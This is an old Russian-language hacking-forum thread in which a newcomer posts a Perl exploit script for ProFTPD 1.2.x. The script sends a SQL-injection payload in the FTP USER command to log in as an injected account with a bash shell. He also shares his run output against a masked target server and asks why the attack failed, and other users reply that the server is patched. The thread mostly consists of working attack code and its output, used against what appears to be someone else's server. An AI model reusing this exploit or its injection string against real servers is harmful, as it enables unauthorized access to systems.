Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
03.04.2006, 12:22
|
|
Новичок
Регистрация: 31.03.2006
Сообщений: 23
Провел на форуме:
82526
Репутация:
2
|
|
Что я делаю не так?
Неавторизованный доступ ProFTPD 1.2.*
Вот сплойт:
Код HTML:
#!/usr/bin/perl
# Origin: runlevel [ runlevel@raregazz.org ] Spain, 2003
# Updated by Sawasoft and Dr. Trunk Latvia, 2003
# Working source! Have fun, scriptkiddiez!
use IO::Socket;
if(@ARGV<2)
{
# print "\nProof Of Concept Sql Inject on ProFTPD\n";
# print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n";
print "DZJAAAAAAAA \n\n\n";
# exit(0);
};
$server = $ARGV[0];
$query = $ARGV[1];
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)
or die "Can't connect. \n";
if(defined($line=<$remote>))
{
print STDOUT $line;
if($query eq "1")
{
print $remote "USER ')UNION SELECT'u','p',1001,1001,'/tmp','/bin/bash'WHERE(''='\n";
}
else
{
print $remote "USER ')UNION SELECT'u','p',1001,1001,'/bin/bash' WHERE(''='\n";
};
if(defined($line=<$remote>))
{
print STDOUT $line;
print $remote "PASS p\n";
if(defined($line=<$remote>))
{
print STDOUT $line;
print "Sent query to $ARGV[0]\n";
if($line =~ /230/)
{
print "[------- Sql Inject Able \n";
}
else
{
print "[------- Sql Inject Unable \n";
};
};
};
};
close $remote;
C:\Perl\bin>perl C:\Perl\ftp.pl ***.**.**.**
DZJAAAAAAAA
220 ProFTPD 1.2.10 Server (ProFTPD) [***.**.**.**]
331 Password required for ')UNION.
530 Login incorrect.
Sent query to ***.**.**.**
[------- Sql Inject Unable
Вот что получаеться
Последний раз редактировалось ProblemaT2; 03.04.2006 в 12:30..
|
|
|
03.04.2006, 12:49
|
|
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496
Репутация:
519
|
|
чего непонятного?
Sql Inject Unable
|
|
|
|
03.04.2006, 12:51
|
|
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553
Репутация:
1329
|
|
а ЕСЛИ ПО РУССКИ ТО БАГИ ТАМ НЕТУ! И ОН ТЕБЯ ПОСЫЛАЕТ!!!
|
|
|
|
03.04.2006, 12:54
|
Регистрация: 18.02.2006
Сообщений: 1,090
Провел на форуме:
6489333
Репутация:
1564
|
|
Тема названа туповато...
|
|
|
|
03.04.2006, 12:57
|
|
Новичок
Регистрация: 31.03.2006
Сообщений: 23
Провел на форуме:
82526
Репутация:
2
|
|
Всё понятно.
Просто версия на серваке ProFTPD 1.2.10, по идее уязвимая вот я иподумал что чото не так делаю...
Ещё вот это смущает
Код HTML:
530 Login incorrect
Последний раз редактировалось ProblemaT2; 03.04.2006 в 12:59..
|
|
|
|
03.04.2006, 12:59
|
|
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553
Репутация:
1329
|
|
гы значит пропатчена!
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
